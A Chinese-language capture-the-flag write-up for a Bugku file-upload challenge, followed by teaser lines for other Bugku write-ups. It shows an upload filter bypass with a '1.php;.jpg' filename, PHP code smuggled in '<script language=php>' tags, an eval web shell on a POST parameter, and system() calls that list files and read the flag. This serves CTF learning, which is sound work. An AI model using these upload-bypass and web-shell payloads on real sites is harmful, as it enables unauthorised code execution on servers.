打开题目链接http://47.93.190.246:49166/
看到file还有题目名就想包含一下,当然是尝试的flag.php,结果什么都没有,用php://filter试试发现作者已经过滤了
右键源码看到upload.php
上传文件名为1.php;.jpg,绕过检测,包含一下发现一句话的<?php?>这些字符被过滤,从其他文章处看到构造了<script language=php>@eval($_POST['cmd']);</script>菜刀连接被禁止了,又构造命令执行<acript language=php>system("ls")</script>,文件上传可以看到flag文件名,再构造<script language=php>system("cat flag..........txt")</script>上传得到flag
打开题目链接http://47.93.190.246:49166/ 看到file还有题目名就想包含一下,当然是尝试...
bugku rsa 一道关于rsa常规的ctf题目(来自bugku):链接:https://ctf.bugku.c...
Bugku-代码审计 https://ctf.bugku.com/challenges 1、extract变量覆盖...
去训练一下基础! Bugku地址:https://ctf.bugku.com/challenges 0x01 we...
打开网站,是一个上传文件的网页,那我们先按照要求上传png文件试试,上传图片说打不开图片,陷入迷茫。 那应该不是靠...
前言: 此文用于记录做BugkuCTF时遇到的知识,主要为了巩固和查阅。 记录各种知识 1.stripos(字符串...
前两天无意间翻到一个CTF平台--BugKu,记下wp WEB 1.Web2 查看源代码即可得到flag 2.计算...
抓包获得源码 代码中的单双引号的嵌套,其中username和password列名在数据库中是存字符串的,而字符串是...
一道sql注入题,记录下相关知识点。 打开是个平平无奇的登陆界面,然而现实是残酷的,=,空格,and, or等字符...
python 在ctf进制转换的应用 4进制转换(题目来源bugku)进制字符串如下:1212 1230 1201...
本文标题:bugku ctf之文件上传2
本文链接:https://www.haomeiwen.com/subject/nubnextx.html
网友评论